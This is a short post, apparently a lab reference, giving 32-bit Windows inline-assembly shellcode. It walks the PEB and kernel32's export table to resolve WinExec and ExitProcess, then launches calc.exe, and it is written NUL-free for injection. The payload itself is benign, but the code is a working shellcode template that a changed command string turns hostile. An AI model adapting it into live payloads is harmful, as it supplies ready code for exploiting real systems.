【ShellCode】运行计算器的Shell Code,仅供参考
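/*
 * Reference shellcode harness (32-bit x86 Windows, MSVC `_asm` only).
 *
 * Flow: locate kernel32.dll through the PEB loader list, resolve
 * GetProcAddress by walking kernel32's export name table, then call
 * WinExec("calc.exe", SW_SHOWNORMAL) followed by ExitProcess(0).
 * main() never returns.
 *
 * The instruction stream is kept free of NUL bytes: strings are pushed as
 * 4-byte chunks with an 'a' pad that a `sub` turns into the terminator, and
 * small constants are built with xor/inc instead of `mov reg, imm`.
 *
 * Assumptions the code makes that no documented contract guarantees:
 *   - kernel32.dll is the THIRD entry of PEB->Ldr.InMemoryOrderModuleList
 *     (exe, ntdll, kernel32); a different load order breaks the lookup.
 *   - The name scan matches the first export whose first 12 bytes are
 *     "GetProcAddre"; with kernel32's name-sorted export table that is
 *     GetProcAddress.
 *   - fs:[30h] is the PEB and the export-directory RVA sits at PE+0x78
 *     (PE32 layout) -- true only for a 32-bit process.
 *   - WinExec's return value (>31 on success) is not checked; failure is silent.
 *
 * For lab / reference use only.
 */
int main()
{
_asm
{
    //--- Locate the base address of kernel32.dll via the PEB loader list ---
    xor ecx, ecx
    mov eax, dword ptr fs:[ecx + 30h]     // EAX = PEB (TEB+0x30)
    mov eax, dword ptr [eax + 0Ch]        // EAX = PEB->Ldr
    mov esi, dword ptr [eax + 14h]        // ESI = Ldr->InMemoryOrderModuleList.Flink (1st entry)
    lods dword ptr [esi]                  // EAX = 2nd entry (ntdll)
    xchg eax, esi
    lods dword ptr [esi]                  // EAX = 3rd entry (kernel32, see assumptions above)
    mov ebx, dword ptr [eax + 10h]        // EBX = DllBase (0x10 past InMemoryOrderLinks)

    //--- Find kernel32's export directory ---
    mov edx, dword ptr [ebx + 3Ch]        // EDX = IMAGE_DOS_HEADER.e_lfanew
    add edx, ebx                          // EDX = IMAGE_NT_HEADERS
    mov edx, dword ptr [edx + 78h]        // EDX = RVA of export directory (PE32 DataDirectory[0])
    add edx, ebx                          // EDX = IMAGE_EXPORT_DIRECTORY
    mov esi, dword ptr [edx + 20h]        // ESI = RVA of AddressOfNames
    add esi, ebx                          // ESI = AddressOfNames
    xor ecx, ecx                          // ECX = name counter

    //--- Scan the name table for "GetProcAddre..." ---
Get_Function:
    inc ecx                               // ECX = 1-based index of the name read below
    lods dword ptr [esi]                  // EAX = RVA of next name
    add eax, ebx                          // EAX = name string
    cmp dword ptr [eax], 50746547h        // "GetP"
    jne Get_Function
    cmp dword ptr [eax + 4], 41636F72h    // "rocA"
    jne Get_Function
    cmp dword ptr [eax + 8], 65726464h    // "ddre"
    jne Get_Function

    //--- Map the matched name to its function address ---
    // Name index i pairs with AddressOfNameOrdinals[i], which is the index
    // into AddressOfFunctions. ECX is 1-based here, so convert it to the
    // 0-based name index BEFORE the ordinal lookup. (Reading ordinals[i+1]
    // and subtracting 1 afterwards only works while kernel32's ordinal table
    // is sequential at that position.)
    dec ecx                               // ECX = 0-based name index i
    mov esi, dword ptr [edx + 24h]        // ESI = RVA of AddressOfNameOrdinals
    add esi, ebx                          // ESI = AddressOfNameOrdinals
    movzx ecx, word ptr [esi + ecx * 2]   // ECX = ordinals[i] (index into AddressOfFunctions)
    mov esi, dword ptr [edx + 1Ch]        // ESI = RVA of AddressOfFunctions
    add esi, ebx                          // ESI = AddressOfFunctions
    mov edx, dword ptr [esi + ecx * 4]    // EDX = RVA of GetProcAddress
    add edx, ebx                          // EDX = GetProcAddress
    push ebx                              // save kernel32 base
    push edx                              // save GetProcAddress

    //--- Resolve WinExec: build "WinExec\0" on the stack ---
    xor ecx, ecx
    push ecx                              // terminator dword (4 zero bytes)
    mov ecx, 61636578h                    // "xeca" in memory order
    push ecx
    sub dword ptr [esp + 3], 61h          // turn the 'a' pad into NUL -> "xec\0"
    push 456E6957h                        // "WinE" -> stack now holds "WinExec\0"
    push esp                              // lpProcName = &"WinExec"
    push ebx                              // hModule = kernel32
    call edx                              // GetProcAddress (stdcall: callee pops the 2 args)
    add esp, 8                            // drop "WinE" and "xec\0"
    pop ecx                               // drop the terminator dword (ECX = 0)
    push eax                              // save WinExec

    //--- WinExec("calc.exe", SW_SHOWNORMAL) ---
    xor ecx, ecx
    push ecx                              // terminator
    push 6578652Eh                        // ".exe"
    push 636C6163h                        // "calc" -> "calc.exe\0"
    mov ebx, esp                          // EBX = &"calc.exe"
    xor ecx, ecx
    inc ecx                               // ECX = 1 = SW_SHOWNORMAL, built without a NUL byte
    push ecx                              // uCmdShow
    push ebx                              // lpCmdLine
    call eax                              // WinExec; return value is not checked

    //--- Restore the saved pointers ---
    add esp, 10h                          // drop "calc", ".exe", terminator and saved WinExec
    pop edx                               // EDX = GetProcAddress
    pop ebx                               // EBX = kernel32 base

    //--- ExitProcess(0): build "ExitProcess\0" the same way ---
    mov ecx, 61737365h                    // "essa" in memory order
    push ecx
    sub dword ptr [esp + 3], 61h          // -> "ess\0" (the NUL is the only terminator)
    push 636F7250h                        // "Proc"
    push 74697845h                        // "Exit" -> "ExitProcess\0"
    push esp                              // lpProcName
    push ebx                              // hModule = kernel32
    call edx                              // GetProcAddress
    xor ecx, ecx
    push ecx                              // uExitCode = 0
    call eax                              // ExitProcess; does not return
}
}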